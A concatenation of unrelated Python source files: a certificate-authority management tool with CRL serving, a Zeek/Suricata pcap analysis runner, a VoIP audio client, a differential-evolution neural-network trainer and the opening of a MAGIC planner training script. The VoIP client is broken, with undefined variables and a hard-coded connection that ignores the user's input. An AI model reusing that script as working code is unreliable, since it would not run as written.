Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
"""
# protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
global_password=None
def globalcb(*args):
global global_password
return str(global_password)
def setpassword(pw):
global global_password
if len(pw)==0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir,name):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
cacert = X509.load_cert('cacert.crt')
ca_pk = EVP.load_key_string(str(priv[0]['ca']))
cert,pk = ca_impl.mk_signed_cert(cacert,ca_pk,name,priv[0]['lastserial']+1)
with open('%s-cert.crt'%name, 'w') as f:
f.write(cert.as_pem())
f = BIO.MemoryBuffer()
pk.save_key_bio(f,None)
priv[0][name]=f.getvalue()
f.close()
#increment serial number after successful creation
priv[0]['lastserial']+=1
write_private(priv)
# write out the private key with password
with os.fdopen(os.open("%s-private.pem"%name,os.O_WRONLY | os.O_CREAT,0600), 'w') as f:
biofile = BIO.File(f)
pk.save_key_bio(biofile, 'aes_256_cbc', globalcb)
biofile.close()
pk.get_rsa().save_pub_key('%s-public.pem'%name)
cc = X509.load_cert('%s-cert.crt'%name)
if cc.verify(cacert.get_pubkey()):
logger.info("Created certificate for name %s successfully in %s"%(name,workingdir))
else:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.json")
cacert, ca_pk, _ = ca_impl.mk_cacert()
priv=read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.as_pem())
f = BIO.MemoryBuffer()
ca_pk.save_key_bio(f,None)
priv[0]['ca']=f.getvalue()
f.close()
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
ca_pk.get_rsa().save_pub_key('ca-public.pem')
# generate an empty crl
crl = ca_impl.gencrl([],cacert.as_pem(),str(priv[0]['ca']))
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
# Sanity checks...
cac = X509.load_cert('cacert.crt')
if cac.verify():
logger.info("CA certificate created successfully in %s"%workingdir)
else:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir,name,insecure=False):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
# zip up the crt, private key, and public key
with open('cacert.crt','r') as f:
cacert = f.read()
with open("%s-public.pem"%name,'rb') as f:
pub = f.read()
with open("%s-cert.crt"%name,'rb') as f:
cert = f.read()
with open('cacrl.der','r') as f:
crl = f.read()
with open('cacrl.pem','r') as f:
crlpem = f.read()
cert_obj = X509.load_cert_string(cert)
serial = cert_obj.get_serial_number()
subject = str(cert_obj.get_subject())
priv = read_private()
private = priv[0][name]
with open("%s-private.pem"%name,'rb') as f:
prot_priv = f.read()
#code to create a pem formatted protected private key using the keystore password
# pk = EVP.load_key_string(str(priv[0][name]))
# f = BIO.MemoryBuffer()
# # globalcb will return the global password provided by the user
# pk.save_key_bio(f, 'aes_256_cbc', globalcb)
# prot_priv = f.getvalue()
# f.close()
# no compression to avoid extraction errors in tmpfs
sf = cStringIO.StringIO()
with zipfile.ZipFile(sf,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,private)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
pkg = sf.getvalue()
if insecure:
logger.warn("Unprotected private keys in cert package being written to disk")
with open('%s-pkg.zip'%name,'w') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip'%name,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,prot_priv)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip"%(name,name))
return pkg,serial,subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile,pemfile):
if config.get('general','ca_implementation')=='openssl':
with open(pemfile,'w') as f:
f.write("")
else:
tpm_exec.run("openssl crl -in %s -inform der -out %s"%(derfile,pemfile),lock=False)
def get_crl_distpoint(cert_path):
cert_obj = X509.load_cert(cert_path)
text= cert_obj.as_text()
incrl=False
distpoint=""
for line in text.split('\n'):
line = line.strip()
if line.startswith("X509v3 CRL Distribution Points:"):
incrl = True
if incrl and line.startswith("URI:"):
distpoint = line[4:]
break
return distpoint
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir,name=None,serial=None):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
if name is not None and serial is not None:
raise Exception("You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = X509.load_cert("%s-cert.crt"%name)
serial = cert.get_serial_number()
#convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = str(priv[0]['ca'])
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = str(priv[0]['ca'])
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir,cert_path):
#just load up the password for later
read_private()
serveraddr = ('', common.CRL_PORT)
server = ThreadedCRLServer(serveraddr,CRLHandler)
if os.path.exists('%s/cacrl.der'%workingdir):
logger.info("Loading existing crl: %s/cacrl.der"%workingdir)
with open('%s/cacrl.der'%workingdir,'r') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d"%(socket.getfqdn(),common.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True:
try:
if os.path.exists('%s/cacrl.der'%workingdir):
retout = tpm_exec.run("openssl crl -inform der -in %s/cacrl.der -text -noout"%workingdir,lock=False)[0]
for line in retout:
line = line.strip()
if line.startswith("Next Update:"):
expire = datetime.datetime.strptime(line[13:],"%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow()+datetime.timedelta(hours=6)
if expire<=in1hour:
logger.info("Certificate to expire soon %s, re-issuing"%expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
#server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
serial = revocation.get("metadata",{}).get("cert_serial",None)
if revocation.get('type',None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s"%revocation)
return
logger.info("Revoking certificate: %s"%serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(revoke_callback,revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warn("No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self,crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
import glob
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = json.dumps(priv)
key = crypto.kdf(global_password,salt)
ciphertext = crypto.encrypt(priv_encoded,key)
towrite = {'salt':salt,'priv':ciphertext}
with os.fdopen(os.open('private.json',os.O_WRONLY | os.O_CREAT,0600), 'w') as f:
json.dump(towrite,f)
def read_private():
global global_password
if global_password is None:
setpassword(getpass.getpass("Please enter the password to decrypt your keystore: "))
if os.path.exists('private.json'):
with open('private.json','r') as f:
toread = json.load(f)
key = crypto.kdf(global_password,toread['salt'])
try:
plain = crypto.decrypt(toread['priv'],key)
except ValueError:
raise Exception("Invalid password for keystore")
return json.loads(plain),toread['salt']
else:
#file doesn't exist, just invent a salt
return {'revoked_keys':[]},base64.b64encode(crypto.generate_random_key())
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command',action='store',dest='command',required=True,help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name',action='store',help='the common name of the certificate to create')
parser.add_argument('-d','--dir',action='store',help='use a custom directory to store certificates and keys')
parser.add_argument('-i','--insecure',action='store_true',default=False,help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
if common.DEVELOP_IN_ECLIPSE and len(argv)==1:
argv=['-c','init']
#argv=['-c','create','-n',socket.getfqdn()]
argv=['-c','create','-n','client']
#argv=['-c','pkg','-n','client']
argv=['-c','revoke','-n','client']
argv=['-c','listen','-d','myca']
else:
argv = argv[1:]
# never prompt for passwords in development mode
if common.DEVELOP_IN_ECLIPSE:
setpassword('default')
args = parser.parse_args(argv)
if args.dir==None:
if os.getuid()!=0 and common.REQUIRE_ROOT:
logger.error("If you don't specify a working directory, this process must be run as root to access %s"%common.WORK_DIR)
sys.exit(-1)
workingdir = common.CA_WORK_DIR
else:
workingdir = args.dir
if args.command=='init':
cmd_init(workingdir)
elif args.command=='create':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir,args.name)
elif args.command=='pkg':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir,args.name,args.insecure)
elif args.command=='revoke':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command=='listen':
if args.name is None:
args.name = "%s/RevocationNotifier-cert.crt"%workingdir
logger.warning("using default name for revocation cert %s"%args.name)
cmd_listen(workingdir,args.name)
else:
logger.error("Invalid command: %s"%args.command)
parser.print_help()
sys.exit(-1)
if __name__=="__main__":
try:
main()
except Exception as e:
logger.exception(e)
|
analysis.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from classes.zeekengine import ZeekEngine
from classes.suricataengine import SuricataEngine
from multiprocessing import Process, Manager
import sys
import re
import json
import os
"""
This file is called by the frontend but the analysis
can be done in standalone by just submitting the directory
containing a capture.pcap file.
"""
if __name__ == "__main__":
if len(sys.argv) == 2:
capture_directory = sys.argv[1]
if os.path.isdir(capture_directory):
# Alerts bucket.
manager = Manager()
alerts = manager.dict()
def zeekengine(alerts):
zeek = ZeekEngine(capture_directory)
zeek.start_zeek()
alerts["zeek"] = zeek.get_alerts()
def snortengine(alerts):
suricata = SuricataEngine(capture_directory)
suricata.start_suricata()
alerts["suricata"] = suricata.get_alerts()
# Start the engines.
p1 = Process(target=zeekengine, args=(alerts,))
p2 = Process(target=snortengine, args=(alerts,))
p1.start()
p2.start()
# Wait to their end.
p1.join()
p2.join()
# Some formating and alerts.json writing.
with open(os.path.join(capture_directory, "alerts.json"), "w") as f:
report = {"high": [], "moderate": [], "low": []}
for alert in (alerts["zeek"] + alerts["suricata"]):
if alert["level"] == "High":
report["high"].append(alert)
if alert["level"] == "Moderate":
report["moderate"].append(alert)
if alert["level"] == "Low":
report["low"].append(alert)
f.write(json.dumps(report))
else:
print("The directory doesn't exist.")
else:
print("Please specify a capture directory in argument.")
|
client_audio_multi_2.py
|
#!/usr/bin/env python
import pyaudio
import socket
import sys
import time
from array import array
from struct import pack
from multiprocessing import Process
# Pyaudio Initialization
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 10240
backlog = 5
THRESHOLD = 5
def is_silent(snd_data):
#return True of below silent threshold
return max(snd_data) < THRESHOLD
def audioSend(stream):
# Main Functionality
while 1:
data = array('h', stream.read(chunk))
silent = is_silent(data)
if silent:
count_silent += 1
if count_silent > 65:
print 'stop'
break #when silent counter hits 30, close connection
s.send(data)
#s.recv(size)
def audioRecv(stream):
while 1:
data = stream.recv(size)
if data:
#print 'receiving!'
# Write data to pyaudio stream
stream.write(data) # Stream the received audio data
pSend = pyaudio.PyAudio()
streamSend = pSend.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
frames_per_buffer = chunk)
pRecv = pyaudio.PyAudio();
streamRecv = pRecv.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
output = True)
# Socket Initialization
size = 1024
# Parameters to start server
print 'Enter the desired Server Port'
portRecv = int(sys.stdin.readline())
socketRecv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketRecv.bind(('',portRecv))
socketRecv.listen(backlog)
print 'Server Started!'
# Parameters to connect to recipient
print 'Enter the IP of the recipient'
hostSend = sys.stdin.readline()
print 'Enter the port number'
portSend = int(sys.stdin.readline())
print 'Trying to connect to ' + hostSend + ' ' + str(portSend)
socketSend = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socketSend.connect(('',9001))
print 'Press enter to start VOIP'
sys.stdin.readline()
procRecv = Process(target = audioRecv, args = (streamRecv,))
procSend = Process(target = audioSend, args = (streamSend,))
procRecv.daemon = True
procSend.daemon = True
procRecv.start()
procSend.start()
#need a silent counter or else connection will close immediately
r = array('h')
count_silent = 0
socketRecv.close()
socketSend.close()
streamSend.close()
streamRecv.close()
pSend.terminate()
pRecv.terminate()
|
NNDE.py
|
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
from sklearn.model_selection import StratifiedKFold
def gen_rand(n_size=1):
'''
This function return a n_size-dimensional random vector.
'''
return np.random.random(n_size)
class NN_DE(object):
def __init__(self, n_pop=10, n_neurons=5, F=0.2, Cr=0.9, p=1, change_scheme=True ,scheme='rand',
bounds=[-1, 1], max_sp_evals=np.int(1e5)):
#self.n_gens=n_gens
self.n_pop=n_pop
self.n_neurons=n_neurons
self.F=F*np.ones(self.n_pop)
self.Cr=Cr*np.ones(self.n_pop)
self.bounds=bounds
self.p=p
self.scheme=scheme
self.change_schame=change_scheme
self.max_sp_evals=max_sp_evals
self.sp_evals=0
self.interactions=0
# Build generic model
model = Sequential()
model.add(Dense(self.n_neurons, input_dim=100, activation='tanh'))
model.add(Dense(1, activation='tanh'))
model.compile( loss='mean_squared_error', optimizer = 'rmsprop', metrics = ['accuracy'] )
self.model=model
self.change_schame=False
self.n_dim=model.count_params()
#self.population=NN_DE.init_population(self, pop_size=self.n_pop,
# dim=self.n_dim, bounds=self.bounds)
#self.train_dataset= train_dataset
#self.test_dataset= test_dataset
def init_population(self, pop_size, dim, bounds=[-1,1]):
'''
This function initialize the population to be use in DE
Arguments:
pop_size - Number of individuals (there is no default value to this yet.).
dim - dimension of the search space (default is 1).
bounds - The inferior and superior limits respectively (default is [-1, 1]).
'''
return np.random.uniform(low=bounds[0], high=bounds[1], size=(pop_size, dim))
def keep_bounds(self, pop, bounds, idx):
'''
This function keep the population in the seach space
Arguments:
pop - Population;
bounds - The inferior and superior limits respectively
'''
#up_ = np.where(pop>bounds[1])
#down_ = np.where(pop<bounds[1])
#best_ = pop[idx]
#print(pop[pop<bounds[0]])
#print(down_)
#print(best_.shape)
pop[pop<bounds[0]] = bounds[0]; pop[pop>bounds[1]] = bounds[1]
#pop[pop<bounds[0]] = 0.5*(bounds[0]+best_[down_]); pop[pop>bounds[1]] = 0.5*(bounds[1]+best_[up_])
return pop
# Define the Fitness to be used in DE
def sp_fitness(self, target, score):
'''
Calculate the SP index and return the index of the best SP found
Arguments:
target: True labels
score: the predicted labels
'''
from sklearn.metrics import roc_curve
fpr, tpr, thresholds = roc_curve(target, score)
jpr = 1. - fpr
sp = np.sqrt( (tpr + jpr)*.5 * np.sqrt(jpr*tpr) )
idx = np.argmax(sp)
return sp[idx], tpr[idx], fpr[idx]#sp, idx, sp[idx], tpr[idx], fpr[idx]
def convert_vector_weights(self, pop, nn_model):
model = nn_model
generic_weights = model.get_weights()
hl_lim = generic_weights[0].shape[0]*generic_weights[0].shape[1]
w = []
hl = pop[:hl_lim]
ol = pop[hl_lim+generic_weights[1].shape[0]:hl_lim+generic_weights[1].shape[0]+generic_weights[1].shape[0]]
w.append(hl.reshape(generic_weights[0].shape))
w.append(pop[hl_lim:hl_lim+generic_weights[1].shape[0]])
w.append(ol.reshape(generic_weights[2].shape))
w.append(np.array(pop[-1]).reshape(generic_weights[-1].shape))
return w
def set_weights_to_keras_model_and_compute_fitness(self,pop, data, test_data, nn_model):
'''
This function will create a generic model and set the weights to this model and compute the fitness.
Arguments:
pop - The population of weights.
data - The samples to be used to test.
'''
fitness = np.zeros((pop.shape[0],3))
test_fitness = np.zeros((pop.shape[0],3))
model=nn_model
for ind in range(pop.shape[0]):
w = NN_DE.convert_vector_weights(self, pop=pop[ind], nn_model=model)
model.set_weights(w)
y_score = model.predict(data[0])
fitness[ind] = NN_DE.sp_fitness(self, target=data[1], score=y_score)
# Compute the SP for test in the same calling to minimeze the evals
test_y_score = model.predict(test_data[0])
test_fitness[ind] = NN_DE.sp_fitness(self, target=test_data[1], score=test_y_score)
#print('Population ind: {} - SP: {} - PD: {} - PF: {}'.format(ind, fitness[ind][0], fitness[ind][1], fitness[ind][2]))
return fitness, test_fitness
def evolution(self, train_dataset, test_dataset):
self.population=NN_DE.init_population(self, pop_size=self.n_pop,
dim=self.n_dim, bounds=self.bounds)
r_NNDE = {}
fitness, test_fitness = NN_DE.set_weights_to_keras_model_and_compute_fitness(self, pop=self.population,
data=train_dataset,
test_data=test_dataset,
nn_model=self.model)
best_idx = np.argmax(fitness[:,0])
#print('Best NN found - SP: {} / PD: {} / FA: {}'.format(fitness[best_idx][0],
# fitness[best_idx][1],
# fitness[best_idx][2]))
#print('Test > Mean - SP: {} +- {}'.format(np.mean(test_fitness,axis=0)[0],
# np.std(test_fitness,axis=0)[0]))
# Create the vectors F and Cr to be adapted during the interactions
NF = np.zeros_like(self.F)
NCr = np.zeros_like(self.Cr)
# Create a log
r_NNDE['log'] = []
r_NNDE['log'].append((self.sp_evals, fitness[best_idx], np.mean(fitness, axis=0),
np.std(fitness, axis=0), np.min(fitness, axis=0), np.median(fitness, axis=0), self.F, self.Cr))
r_NNDE['test_log'] = []
r_NNDE['test_log'].append((self.sp_evals, test_fitness[best_idx], np.mean(test_fitness, axis=0),
np.std(test_fitness, axis=0), np.min(test_fitness, axis=0), np.median(test_fitness, axis=0), self.F, self.Cr))
while self.sp_evals < self.max_sp_evals:
#print('===== Interaction: {} ====='.format(self.interactions+1))
# ============ Mutation Step ===============
mutant = np.zeros_like(self.population)
for ind in range(self.population.shape[0]):
if gen_rand() < 0.1:
NF[ind] = 0.2 +0.2*gen_rand()
else:
NF[ind] = self.F[ind]
tmp_pop = np.delete(self.population, ind, axis=0)
choices = np.random.choice(tmp_pop.shape[0], 1+2*self.p, replace=False)
diffs = 0
for idiff in range(1, len(choices), 2):
diffs += NF[ind]*((tmp_pop[choices[idiff]]-tmp_pop[choices[idiff+1]]))
if self.scheme=='rand':
mutant[ind] = tmp_pop[choices[0]] + diffs
elif self.scheme=='best':
mutant[ind] = self.population[best_idx] + diffs
# keep the bounds
mutant = NN_DE.keep_bounds(self, mutant, bounds=[-1,1], idx=best_idx)
# ============ Crossover Step =============
trial_pop = np.copy(self.population)
K = np.random.choice(trial_pop.shape[1])
for ind in range(trial_pop.shape[0]):
if gen_rand() < 0.1:
NCr[ind] = 0.8 +0.2*gen_rand()
else:
NCr[ind] = self.Cr[ind]
for jnd in range(trial_pop.shape[1]):
if jnd == K or gen_rand()<NCr[ind]:
trial_pop[ind][jnd] = mutant[ind][jnd]
# keep the bounds
trial_pop = NN_DE.keep_bounds(self, trial_pop, bounds=[-1,1], idx=best_idx)
trial_fitness, test_fitness = NN_DE.set_weights_to_keras_model_and_compute_fitness(self, pop=trial_pop,
data=train_dataset,
test_data=test_dataset,
nn_model=self.model)
self.sp_evals += self.population.shape[0]
# ============ Selection Step ==============
winners = np.where(trial_fitness[:,0]>fitness[:,0])
# Auto-adtaptation of F and Cr like NSSDE
self.F[winners] = NF[winners]
self.Cr[winners] = NCr[winners]
# Greedy Selection
fitness[winners] = trial_fitness[winners]
self.population[winners] = trial_pop[winners]
best_idx = np.argmax(fitness[:,0])
if self.interactions > 0.95*self.max_sp_evals/self.n_pop:
print('=====Interaction: {}====='.format(self.interactions+1))
print('Best NN found - SP: {} / PD: {} / FA: {}'.format(fitness[best_idx][0],
fitness[best_idx][1],
fitness[best_idx][2]))
print('Test > Mean - SP: {} +- {}'.format(np.mean(test_fitness,axis=0)[0],
np.std(test_fitness,axis=0)[0]))
self.interactions += 1.0
#if fitness[best_idx][0]>0.90 and self.change_schame==False:
# if self.scheme == 'best':
# if self.scheme!='rand':
# print('Changing the scheme to rand/p/bin')
# self.scheme = 'rand'
# self.change_schame=True
# else:
# if self.scheme!='best':
# print('Changing the scheme to best/p/bin')
# self.scheme = 'best'
# self.change_schame=True
r_NNDE['log'].append((self.sp_evals, fitness[best_idx], np.mean(fitness, axis=0),
np.std(fitness, axis=0), np.min(fitness, axis=0), np.median(fitness, axis=0), self.F, self.Cr))
r_NNDE['test_log'].append((self.sp_evals, test_fitness[best_idx], np.mean(test_fitness, axis=0),
np.std(test_fitness, axis=0), np.min(test_fitness, axis=0), np.median(test_fitness, axis=0), self.F, self.Cr))
# Compute the test
#test_fitness = NN_DE.set_weights_to_keras_model_and_compute_fitness(self, pop=self.population,
# data=self.test_dataset, nn_model=self.model)
r_NNDE['champion weights'] = NN_DE.convert_vector_weights(self, self.population[best_idx], self.model)
r_NNDE['model'] = self.model
r_NNDE['best index'] = best_idx
r_NNDE['Best NN'] = fitness[best_idx]
r_NNDE['train_fitness'] = fitness
r_NNDE['test_fitness'] = test_fitness
r_NNDE['population'] = self.population,
return r_NNDE
if __name__ == '__main__':
data = np.load('data17-18_13TeV.sgn_lhmedium_probes.EGAM2.bkg.vetolhvloose.EGAM7.samples.npz')
sgn = data['signalPatterns_etBin_2_etaBin_0']
bkg = data['backgroundPatterns_etBin_2_etaBin_0']
sgn_trgt = np.ones(sgn.shape[0])
bkg_trgt = -1*np.ones(bkg.shape[0])
sgn_normalized = np.zeros_like(sgn)
for ind in range(sgn.shape[0]):
sgn_normalized[ind] = sgn[ind]/np.abs(np.sum(sgn[ind]))
bkg_normalized = np.zeros_like(bkg)
for ind in range(bkg.shape[0]):
bkg_normalized[ind] = bkg[ind]/np.abs(np.sum(bkg[ind]))
data_ = np.append(sgn_normalized, bkg_normalized, axis=0)
trgt = np.append(sgn_trgt, bkg_trgt)
skf = StratifiedKFold(n_splits=10)
CVO = list(skf.split(data_, trgt))
import multiprocessing
import time
nn_de = NN_DE(n_pop=20, max_sp_evals=20, scheme='rand')
def worker(proc_id, result_dict):
print('Work Fold: '+ str(proc_id+1))
train_index, test_index = CVO[proc_id]
return_dict['Fold {}'.format(proc_id+1)] = nn_de.evolution(train_dataset=(data_[train_index], trgt[train_index]),
test_dataset=(data_[test_index], trgt[test_index]))
inicio = time.time()
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for ifold in range(len(CVO)):
p = multiprocessing.Process(target=worker, args=(ifold,return_dict))
jobs.append(p)
p.start()
time.sleep(5)
for proc in jobs:
proc.join()
fim=time.time()
print('Demorou - {} segundos'.format(fim-inicio))
#import pickle
#with open('results_NNDE.2000SPevals.pickle', 'wb') as handle:
# pickle.dump(return_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
|
train.py
|
#!/usr/bin/env python3
import argparse
parser = argparse.ArgumentParser(description='Macro-DESPOT (MAGIC) Training Args')
parser.add_argument('--task', required=True,
help='Task')
parser.add_argument('--macro-length', type=int, required=True,
help='Macro-action length')
parser.add_argument('--num-env', type=int, default=16,
help='Number of environments (default: 16)')
parser.add_argument('--num-iterations', type=int, default=None)
parser.add_argument('--not-belief-dependent', dest='belief_dependent', default=True, action='store_false')
parser.add_argument('--not-context-dependent', dest='context_dependent', default=True, action='store_false')
parser.add_argument('--output-dir', required=False, default=None)
args = parser.parse_args()
import os
import sys
sys.path.append('{}/../'.format(os.path.dirname(os.path.realpath(__file__))))
from environment import Environment, Response
from models import MAGICGenNet, MAGICCriticNet, MAGICGenNet_DriveHard, MAGICCriticNet_DriveHard
from replay import ReplayBuffer
from utils import PARTICLE_SIZES, CONTEXT_SIZES
import cv2
import itertools
import multiprocessing
import numpy as np
import struct
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import zmq
np.set_printoptions(precision=4, suppress=True)
torch.set_num_threads(1)
TASK = args.task
MACRO_LENGTH = args.macro_length
PARTICLE_SIZE = PARTICLE_SIZES[TASK] if TASK in PARTICLE_SIZES else None
CONTEXT_SIZE = CONTEXT_SIZES[TASK] if TASK in CONTEXT_SIZES else None
BELIEF_DEPENDENT = args.belief_dependent
CONTEXT_DEPENDENT = args.context_dependent
# Training configurations
REPLAY_MIN = 10000
REPLAY_MAX = 100000
REPLAY_SAMPLE_SIZE = 256
SAVE_INTERVAL = 5000 if TASK == 'DriveHard' else 10000
PRINT_INTERVAL = 100
RECENT_HISTORY_LENGTH = 50
OUTPUT_DIR = args.output_dir
SAVE_PATH = 'learned_{}_{}/'.format(TASK, MACRO_LENGTH)
NUM_ITERATIONS = args.num_iterations
NUM_CURVES = 8
if TASK in ['DriveHard']:
TARGET_ENTROPY = np.array([-1.0] * 14, dtype=np.float32)
LOG_ALPHA_INIT = [0.0] * 14
LR = 1e-4
elif TASK in ['PuckPush']:
TARGET_ENTROPY = [-5.0] * NUM_CURVES
LOG_ALPHA_INIT = [-1.0] * NUM_CURVES
LR = 1e-4
elif TASK in ['LightDark']:
TARGET_ENTROPY = [-5.0] * NUM_CURVES
LOG_ALPHA_INIT = [-3.0] * NUM_CURVES
LR = 1e-4
LOG_ALPHA_MIN = -10.
LOG_ALPHA_MAX = 20.
NUM_ENVIRONMENTS = args.num_env
ZMQ_ADDRESS = 'tcp://127.0.0.1'
def environment_process(port):
zmq_context = zmq.Context()
socket = zmq_context.socket(zmq.REQ)
socket.connect('{}:{}'.format(ZMQ_ADDRESS, port))
environment = Environment(TASK, MACRO_LENGTH, False)
steps = 0
total_reward = 0
while True:
# Read from environment.
context = environment.read_context()
#context = cv2.imdecode(context, cv2.IMREAD_UNCHANGED)[...,0:2]
state = environment.read_state()
# Call generator if needed.
if state is not None:
socket.send_pyobj((
'CALL_GENERATOR',
context,
state))
params = socket.recv_pyobj()
environment.write_params(params)
# Read response.
response = environment.process_response()
# Add experience.
if state is not None and response.best_value is not None:
socket.send_pyobj((
'ADD_EXPERIENCE',
context,
state,
params,
response.best_value))
socket.recv_pyobj()
# Add to trajectory statistics.
steps += response.steps
total_reward += response.undiscounted_reward
# Upload trajectory statistics.
if response.is_terminal:
collision = response.is_failure
socket.send_pyobj((
'ADD_TRAJECTORY_RESULT',
steps, total_reward, collision, response.stats))
socket.recv_pyobj()
steps = 0
total_reward = 0
def rand_macro_action_set(num_macros, macro_order):
x = np.random.normal(size=(num_macros, macro_order * 2))
x /= np.expand_dims(np.linalg.norm(x, axis=-1), axis=-1)
return x.reshape((num_macros * 2 * macro_order,)).astype(np.float32)
def rand_macro_action_set_drive_straight(num_macros):
x = np.random.uniform(-1.0, 1.0, (num_macros * 2,))
return x.astype(np.float32)
if __name__ == '__main__':
if OUTPUT_DIR is not None:
if not os.path.exists(OUTPUT_DIR):
try:
os.makedirs(OUTPUT_DIR)
except:
pass
save_path = SAVE_PATH
if OUTPUT_DIR is not None:
save_path = OUTPUT_DIR + '/' + save_path
if not os.path.exists(save_path):
os.mkdir(save_path)
# Load models.
print('Loading models...')
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if TASK in ['DriveHard']:
gen_model = MAGICGenNet_DriveHard(MACRO_LENGTH, CONTEXT_DEPENDENT, BELIEF_DEPENDENT).float().to(device)
critic_model = MAGICCriticNet_DriveHard(MACRO_LENGTH, True, True).float().to(device)
else:
gen_model = MAGICGenNet(CONTEXT_SIZE, PARTICLE_SIZE, CONTEXT_DEPENDENT, BELIEF_DEPENDENT).float().to(device)
critic_model = MAGICCriticNet(CONTEXT_SIZE, PARTICLE_SIZE, True, True).float().to(device)
gen_model_optimizer = optim.Adam(gen_model.parameters(), lr=LR)
critic_model_optimizer = optim.Adam(critic_model.parameters(), lr=LR)
log_alpha = torch.tensor(LOG_ALPHA_INIT, requires_grad=True, device=device)
